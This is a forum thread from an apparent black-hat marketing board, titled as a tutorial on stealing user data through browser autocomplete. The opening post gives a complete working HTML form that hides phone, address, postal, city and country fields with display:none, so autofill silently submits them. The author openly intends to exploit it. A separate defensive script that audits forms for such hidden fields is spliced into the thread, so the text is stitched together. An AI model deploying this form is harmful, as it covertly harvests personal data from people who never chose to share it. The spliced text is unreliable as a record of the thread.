
Fishkin Tutorial Time: Stealing user data with auto complete

Discussion in 'Black Hat SEO' started by Ste Fishkin, Jan 9, 2017.

  1. Ste Fishkin

    Ste Fishkin Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2011
    Messages:
    2,047
    Likes Received:
    10,418
    A few of you fuckers have commented about how I have been trolling less lately; well, I've found a few more interesting things to do... This is one of them. I saw something similar on Twitter and I was kind of inspired.

    How To Steal Users' Data Using Auto Complete

    [image: screenshot of the two-field demo form]

    As you can see, this is a simple 2-field form and a submit button, but when submitted we get everything the user has shared... Including credit card details (but I will not be sharing this for obvious reasons).

    We get:
    • Name
    • Email
    • Phone
    • Postcode/Zip code
    • City
    • Country
    In fact you can get any data they have saved to their browser when they click auto complete.

    This is one of those "oh fuck" moments you have when your brain just overflows with ideas, right? For the less excited among you, this can be used for lots of stuff, from grabbing extra data on email sign-ups right down to other stuff which is less than legal, and the best part is this is so stupidly simple to do that it's fucking retarded.

    How?

    From the front end you see two simple inputs, but if we look at the HTML there is a little more to it.

    Code:
    <form action="" method="post">
          <p>
            <label for="name">Name</label><br>
            <input id="name" name="name" type="text" placeholder="Your Name">
          </p>
          <p>
            <label for="email">Email</label><br>
            <input id="email" name="email" type="email" placeholder="Your Email">
          </p>
          <p>
            <input type="submit" value="Submit">
          </p>
          <p style="display: none;">
            <input id="phone" name="phone" type="text" placeholder="Your Phone">
          </p>
          <p style="display: none;">
            <input id="organization" name="organization" type="text" placeholder="Your Organization">
          </p>
          <p style="display: none;">
            <input id="address" name="address" type="text" placeholder="Your Address">
          </p>
          <p style="display: none;">
            <input id="postal" name="postal" type="text" placeholder="Your Postal Code">
          </p>
          <p style="display: none;">
            <input id="city" name="city" type="text" placeholder="Your City">
          </p>
          <p style="display: none;">
        <select name="country"><option value=""></option><option value="FI">Finland</option><option value="AF">Afghanistan</option><option value="AX">Åland Islands</option><option value="AL">Albania</option><option value="DZ">Algeria</option><option value="AS">American Samoa</option><option value="AD">Andorra</option><option value="AO">Angola</option><option value="AI">Anguilla</option><option value="AQ">Antarctica</option><option value="AG">Antigua &amp; Barbuda</option><option value="AR">Argentina</option><option value="AM">Armenia</option><option value="AW">Aruba</option><option value="AC">Ascension Island</option><option value="AU">Australia</option><option value="AT">Austria</option><option value="AZ">Azerbaijan</option><option value="BS">Bahamas</option><option value="BH">Bahrain</option><option value="BD">Bangladesh</option><option value="BB">Barbados</option><option value="BY">Belarus</option><option value="BE">Belgium</option><option value="BZ">Belize</option><option value="BJ">Benin</option><option value="BM">Bermuda</option><option value="BT">Bhutan</option><option value="BO">Bolivia</option><option value="BA">Bosnia &amp; Herzegovina</option><option value="BW">Botswana</option><option value="BV">Bouvet Island</option><option value="BR">Brazil</option><option value="IO">British Indian Ocean Territory</option><option value="VG">British Virgin Islands</option><option value="BN">Brunei</option><option value="BG">Bulgaria</option><option value="BF">Burkina Faso</option><option value="BI">Burundi</option><option value="KH">Cambodia</option><option value="CM">Cameroon</option><option value="CA">Canada</option><option value="CV">Cape Verde</option><option value="BQ">Caribbean Netherlands</option><option value="KY">Cayman Islands</option><option value="CF">Central African Republic</option><option value="TD">Chad</option><option value="CL">Chile</option><option value="CN">China</option><option value="CX">Christmas Island</option><option value="CC">Cocos [Keeling] Islands</option><option value="CO">Colombia</option><option value="KM">Comoros</option><option value="CD">Congo [DRC]</option><option value="CG">Congo [Republic]</option><option value="CK">Cook Islands</option><option value="CR">Costa Rica</option><option value="CI">Côte d’Ivoire</option><option value="HR">Croatia</option><option value="CW">Curaçao</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DK">Denmark</option><option value="DJ">Djibouti</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="EC">Ecuador</option><option value="EG">Egypt</option><option value="SV">El Salvador</option><option value="GQ">Equatorial Guinea</option><option value="ER">Eritrea</option><option value="EE">Estonia</option><option value="ET">Ethiopia</option><option value="FK">Falkland Islands [Islas Malvinas]</option><option value="FO">Faroe Islands</option><option value="FJ">Fiji</option><option value="FI">Finland</option><option value="FR">France</option><option value="GF">French Guiana</option><option value="PF">French Polynesia</option><option value="TF">French Southern Territories</option><option value="GA">Gabon</option><option value="GM">Gambia</option><option value="GE">Georgia</option><option value="DE">Germany</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GR">Greece</option><option value="GL">Greenland</option><option value="GD">Grenada</option><option value="GP">Guadeloupe</option><option value="GU">Guam</option><option value="GT">Guatemala</option><option value="GG">Guernsey</option><option value="GN">Guinea</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HT">Haiti</option><option value="HM">Heard &amp; McDonald Islands</option><option value="HN">Honduras</option><option value="HK">Hong Kong</option><option value="HU">Hungary</option><option value="IS">Iceland</option><option value="IN">India</option><option value="ID">Indonesia</option><option value="IR">Iran</option><option value="IQ">Iraq</option><option value="IE">Ireland</option><option value="IM">Isle of Man</option><option value="IL">Israel</option><option value="IT">Italy</option><option value="JM">Jamaica</option><option value="JP">Japan</option><option value="JE">Jersey</option><option value="JO">Jordan</option><option value="KZ">Kazakhstan</option><option value="KE">Kenya</option><option value="KI">Kiribati</option><option value="XK">Kosovo</option><option value="KW">Kuwait</option><option value="KG">Kyrgyzstan</option><option value="LA">Laos</option><option value="LV">Latvia</option><option value="LB">Lebanon</option><option value="LS">Lesotho</option><option value="LR">Liberia</option><option value="LY">Libya</option><option value="LI">Liechtenstein</option><option value="LT">Lithuania</option><option value="LU">Luxembourg</option><option value="MO">Macau</option><option value="MK">Macedonia [FYROM]</option><option value="MG">Madagascar</option><option value="MW">Malawi</option><option value="MY">Malaysia</option><option value="MV">Maldives</option><option value="ML">Mali</option><option value="MT">Malta</option><option value="MH">Marshall Islands</option><option value="MQ">Martinique</option><option value="MR">Mauritania</option><option value="MU">Mauritius</option><option value="YT">Mayotte</option><option value="MX">Mexico</option><option value="FM">Micronesia</option><option value="MD">Moldova</option><option value="MC">Monaco</option><option value="MN">Mongolia</option><option value="ME">Montenegro</option><option value="MS">Montserrat</option><option value="MA">Morocco</option><option value="MZ">Mozambique</option><option value="MM">Myanmar [Burma]</option><option value="NA">Namibia</option><option value="NR">Nauru</option><option value="NP">Nepal</option><option value="NL">Netherlands</option><option value="NC">New Caledonia</option><option value="NZ">New Zealand</option><option value="NI">Nicaragua</option><option value="NE">Niger</option><option value="NG">Nigeria</option><option value="NU">Niue</option><option value="NF">Norfolk Island</option><option value="MP">Northern Mariana Islands</option><option value="NO">Norway</option><option value="OM">Oman</option><option value="PK">Pakistan</option><option value="PW">Palau</option><option value="PS">Palestine</option><option value="PA">Panama</option><option value="PG">Papua New Guinea</option><option value="PY">Paraguay</option><option value="PE">Peru</option><option value="PH">Philippines</option><option value="PN">Pitcairn Islands</option><option value="PL">Poland</option><option value="PT">Portugal</option><option value="PR">Puerto Rico</option><option value="QA">Qatar</option><option value="RE">Réunion</option><option value="RO">Romania</option><option value="RU">Russia</option><option value="RW">Rwanda</option><option value="WS">Samoa</option><option value="SM">San Marino</option><option value="ST">São Tomé &amp; Príncipe</option><option value="SA">Saudi Arabia</option><option value="SN">Senegal</option><option value="RS">Serbia</option><option value="SC">Seychelles</option><option value="SL">Sierra Leone</option><option value="SG">Singapore</option><option value="SX">Sint Maarten</option><option value="SK">Slovakia</option><option value="SI">Slovenia</option><option value="SB">Solomon Islands</option><option value="SO">Somalia</option><option value="ZA">South Africa</option><option value="GS">South Georgia &amp; South Sandwich Islands</option><option value="KR">South Korea</option><option value="SS">South Sudan</option><option value="ES">Spain</option><option value="LK">Sri Lanka</option><option value="BL">St. Barthélemy</option><option value="SH">St. Helena</option><option value="KN">St. Kitts &amp; Nevis</option><option value="LC">St. Lucia</option><option value="MF">St. Martin</option><option value="PM">St. Pierre &amp; Miquelon</option><option value="VC">St. Vincent &amp; Grenadines</option><option value="SR">Suriname</option><option value="SJ">Svalbard &amp; Jan Mayen</option><option value="SZ">Swaziland</option><option value="SE">Sweden</option><option value="CH">Switzerland</option><option value="TW">Taiwan</option><option value="TJ">Tajikistan</option><option value="TZ">Tanzania</option><option value="TH">Thailand</option><option value="TL">Timor-Leste</option><option value="TG">Togo</option><option value="TK">Tokelau</option><option value="TO">Tonga</option><option value="TT">Trinidad &amp; Tobago</option><option value="TA">Tristan da Cunha</option><option value="TN">Tunisia</option><option value="TR">Turkey</option><option value="TM">Turkmenistan</option><option value="TC">Turks &amp; Caicos Islands</option><option value="TV">Tuvalu</option><option value="UM">U.S. Outlying Islands</option><option value="VI">U.S. Virgin Islands</option><option value="UG">Uganda</option><option value="UA">Ukraine</option><option value="AE">United Arab Emirates</option><option value="GB">United Kingdom</option><option value="US">United States</option><option value="UY">Uruguay</option><option value="UZ">Uzbekistan</option><option value="VU">Vanuatu</option><option value="VA">Vatican City</option><option value="VE">Venezuela</option><option value="VN">Vietnam</option><option value="WF">Wallis &amp; Futuna</option><option value="EH">Western Sahara</option><option value="YE">Yemen</option><option value="ZM">Zambia</option><option value="ZW">Zimbabwe</option></select>
          </p>
        </form>
    
    As you can see it's a basic form with labels and inputs wrapped in P tags for styling/spacing.

    The "secret sauce" is the inline styling on the fields you don't see. For those who don't know HTML it's this bit inside the P tags.

    Code:
    style="display: none;"
    This tells the browser not to render the input, but autocomplete ignores it for some reason?

    Hidden fields are completely normal; they are used for spam protection from bots mostly... but I cannot for the life of me think of a valid reason that autocomplete would be allowed to work in these?

    The trick is super simple to do; any retard with even a basic understanding of HTML should be able to go forward and steal data like this. It's not some ground-breaking concept or hack... It's a single inline CSS property.

    But with this little bit of knowledge you can do quite a bit of damage... I plan on making the most of this before the loophole is patched up. In my eyes it's only a matter of time because, like I said, why the fuck is it a good idea to allow this?
     
    • Thanks x 19
    Last edited: Jan 9, 2017
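The pattern in the post above, as an added example that is not part of Ste's original post and not taken from any browser's code: a small Node.js script that audits form markup for exactly this trick, fields a browser may autofill that the user never sees. The regex-based tokenizer (no DOM, no jsdom), the name-to-category heuristics and the sample form are all assumptions chosen for illustration; the sample is a trimmed copy of the form above plus two constructed extras, a type=hidden CSRF token that must not be flagged and a card-number field parked off-screen rather than display:none, so the edge cases are visible.

```javascript
// Added example, not code from the original post. Static audit of form markup
// for fields a browser may autofill although the user cannot see them.
// Assumptions: well-formed HTML, only inline styles / the hidden attribute
// are considered, and the name heuristics below are illustrative, not any
// browser's real matching table.

// Elements without a closing tag; they must not go on the ancestor stack.
const VOID_TAGS = new Set(['input', 'br', 'img', 'hr', 'meta', 'link', 'wbr',
  'area', 'base', 'col', 'embed', 'source', 'track', 'param']);

// Input types a browser never fills from a saved address/payment profile.
const NON_FILLABLE_TYPES = new Set(['hidden', 'submit', 'button', 'reset',
  'checkbox', 'radio', 'file', 'image']);

// Heuristic name/id -> autofill category (assumption, modelled on the OP's fields).
const AUTOFILL_PATTERNS = [
  ['name',           /^(name|fullname|full-name|first|last|fname|lname)/i],
  ['email',          /mail/i],
  ['tel',            /(phone|tel|mobile)/i],
  ['organization',   /(org|company)/i],
  ['street-address', /(address|street)/i],
  ['postal-code',    /(postal|zip|postcode)/i],
  ['address-level2', /city/i],
  ['country',        /country/i],
  ['cc-number',      /(^cc|card|credit)/i],
];

// Parse one start tag's attribute string into a prototype-less object.
function parseAttrs(raw) {
  const attrs = Object.create(null);
  const re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(raw)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// True when an inline style makes the element invisible to the user.
function styleHides(style) {
  const s = (style || '').replace(/\s+/g, '').toLowerCase();
  return /display:none/.test(s) || /visibility:hidden/.test(s)
    || /opacity:0(;|$)/.test(s) || /(left|top):-\d{3,}/.test(s); // off-screen
}

// Autofill category for a field, or null. An explicit autocomplete token wins;
// otherwise name/id heuristics apply, which is roughly why the OP's unlabelled
// fields get filled. autocomplete="off" is deliberately not treated as a
// suppressor because browsers have not consistently honoured it for address data.
function classify(attrs) {
  const token = (attrs.autocomplete || '').trim().toLowerCase();
  if (token && token !== 'off') return token;
  const key = attrs.name || attrs.id || '';
  for (const [category, pattern] of AUTOFILL_PATTERNS) {
    if (pattern.test(key)) return category;
  }
  return null;
}

// Single pass over the markup, tracking whether any open ancestor is hidden,
// reporting every fillable field the user could not see.
function auditForm(html) {
  const findings = [];
  const hiddenStack = []; // one boolean per currently open non-void element
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const [, closing, rawName, rawAttrs] = m;
    const tag = rawName.toLowerCase();
    if (closing) { if (hiddenStack.length) hiddenStack.pop(); continue; }
    const attrs = parseAttrs(rawAttrs);
    const selfHidden = styleHides(attrs.style) || 'hidden' in attrs;
    const ancestorHidden = hiddenStack.includes(true);
    if (tag === 'input' || tag === 'select' || tag === 'textarea') {
      const type = (attrs.type || 'text').toLowerCase();
      const category = classify(attrs);
      if (!NON_FILLABLE_TYPES.has(type) && category && (selfHidden || ancestorHidden)) {
        findings.push({ field: attrs.name || attrs.id || '(unnamed)', tag, category,
          how: selfHidden ? 'own style/hidden attribute' : 'hidden ancestor' });
      }
    }
    if (!VOID_TAGS.has(tag) && !rawAttrs.trim().endsWith('/')) hiddenStack.push(selfHidden);
  }
  return findings;
}

// Constructed sample: trimmed copy of the OP's form plus a hidden CSRF token
// (must not be flagged) and an off-screen card field (must be flagged).
const SAMPLE_FORM = `
<form action="" method="post">
  <p><label for="name">Name</label><br>
     <input id="name" name="name" type="text" placeholder="Your Name"></p>
  <p><label for="email">Email</label><br>
     <input id="email" name="email" type="email" placeholder="Your Email"></p>
  <p><input type="submit" value="Submit"></p>
  <p style="display: none;"><input id="phone" name="phone" type="text"></p>
  <p style="display: none;"><input id="organization" name="organization" type="text"></p>
  <p style="display: none;"><input id="address" name="address" type="text"></p>
  <p style="display: none;"><input id="postal" name="postal" type="text"></p>
  <p style="display: none;"><input id="city" name="city" type="text"></p>
  <p style="display: none;">
    <select name="country"><option value=""></option><option value="FI">Finland</option></select>
  </p>
  <input type="hidden" name="csrf" value="constructed-token">
  <input name="cc-number" type="text" autocomplete="cc-number"
         style="position: absolute; left: -9999px;">
</form>`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditForm(SAMPLE_FORM)) {
    console.log(`${f.tag} "${f.field}" -> ${f.category} (${f.how})`);
  }
}
```

Run it with node and each line names the field, the category it would likely be filled from, and why it is invisible; for the sample that is the six display:none fields from the post and the off-screen card field, while the visible name and email inputs and the type=hidden token are not reported. A static scan only sees inline styles and the hidden attribute, so on a live page the same check belongs in devtools using getComputedStyle and getBoundingClientRect, since stylesheet rules and script-applied styles are invisible to this parser.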
  2. Neon

    Neon Jr. VIP Jr. VIP

    Joined:
    Nov 3, 2013
    Messages:
    2,697
    Likes Received:
    6,314
    Gender:
    Male
    Occupation:
    Traveling the world
    Location:
    Berlin
    Great sir but also ban coming reported.
     
    • Thanks x 4
  3. W9go

    W9go Jr. VIP Jr. VIP Premium Member

    Joined:
    May 16, 2011
    Messages:
    4,622
    Likes Received:
    930
    Gender:
    Male
    Occupation:
    chasing girls
    Location:
    chasing girls
    impressive ;)
     
  4. nikchaing

    nikchaing Jr. VIP Jr. VIP UnGagged Attendee

    Joined:
    Apr 24, 2013
    Messages:
    1,092
    Likes Received:
    2,110
    Location:
    Florida
    shiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
     
    • Thanks x 1
  5. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,020
    Likes Received:
    10,814
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    I love how W130SN shows up as one of the suggested autocomplete values in the demo ....
     
    • Thanks x 4
  6. mnunes532

    mnunes532 Supreme Member

    Joined:
    Jan 21, 2014
    Messages:
    1,350
    Likes Received:
    414
    Gender:
    Male
    Location:
    Portugal
    Damn, so simple and evil...
     
  7. nikchaing

    nikchaing Jr. VIP Jr. VIP UnGagged Attendee

    Joined:
    Apr 24, 2013
    Messages:
    1,092
    Likes Received:
    2,110
    Location:
    Florida
    that's because they are the same person
     
    • Thanks x 2
  8. Ste Fishkin

    Ste Fishkin Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2011
    Messages:
    2,047
    Likes Received:
    10,418
    Everyone on BHW is me, except for you.
     
    • Thanks x 2
  9. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,020
    Likes Received:
    10,814
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    I'm pretty sure I'm not you too, unless I am in which case you are me then who is base? All your base are belong to us?
     
  10. Ste Fishkin

    Ste Fishkin Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2011
    Messages:
    2,047
    Likes Received:
    10,418
    No, you have it wrong.

    You are you.
     
    • Thanks x 1
  11. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,020
    Likes Received:
    10,814
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    But seriously. This is the most black hat shit I've seen in years. Mind blown.
     
    • Thanks x 1
  12. Reaver

    Reaver Jr. VIP Jr. VIP

    Joined:
    Aug 6, 2015
    Messages:
    1,847
    Likes Received:
    5,306
    Gender:
    Female
    Watch some ass come in here and be like "I've known about this for years!"
     
    • Thanks x 1
  13. Heisenberg

    Heisenberg Jr. VIP Jr. VIP

    Joined:
    Sep 11, 2014
    Messages:
    712
    Likes Received:
    371
    Occupation:
    Freelancer
    Location:
    Croatia
    I've known about this for years!
     
    • Thanks x 5
  14. BassTrackerBoats

    BassTrackerBoats Super Moderator Staff Member Moderator Jr. VIP

    Joined:
    Mar 10, 2010
    Messages:
    15,876
    Likes Received:
    29,148
    Occupation:
    I don't actually have a job
    Location:
    Not England
    I've known about this for years!

    No, seriously, what in the world?
     
    • Thanks x 4
  15. nikchaing

    nikchaing Jr. VIP Jr. VIP UnGagged Attendee

    Joined:
    Apr 24, 2013
    Messages:
    1,092
    Likes Received:
    2,110
    Location:
    Florida
    Did some research about how autofill works in different browsers:
    Code:
    https://cloudfour.com/thinks/autofill-what-web-devs-should-know-but-dont/#one-behavior-to-watch-for
     
    • Thanks x 1
  16. Fragmaster

    Fragmaster Jr. VIP Jr. VIP

    Joined:
    Apr 3, 2016
    Messages:
    676
    Likes Received:
    989
    Gender:
    Male
    This is common knowledge, it's just not a topic for an IM forum :)
     
  17. Ste Fishkin

    Ste Fishkin Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2011
    Messages:
    2,047
    Likes Received:
    10,418
    This just makes me think you don't do IM.
     
    • Thanks x 7
  18. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,020
    Likes Received:
    10,814
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    The big sites, FB and Google could do this easily. This is a major league privacy leak.
     
  19. Humanity

    Humanity BANNED BANNED

    Joined:
    Dec 26, 2016
    Messages:
    61
    Likes Received:
    11
    Gender:
    Male
    Question is what % of users are using/having this kind of auto complete.
     
  20. manolo12399

    manolo12399 Senior Member

    Joined:
    Jan 3, 2009
    Messages:
    1,044
    Likes Received:
    185
    Sorry for the retard question, but how can I see the data?

    I saved the OP's code as HTML and tested it in my browser... but I don't see anything happening.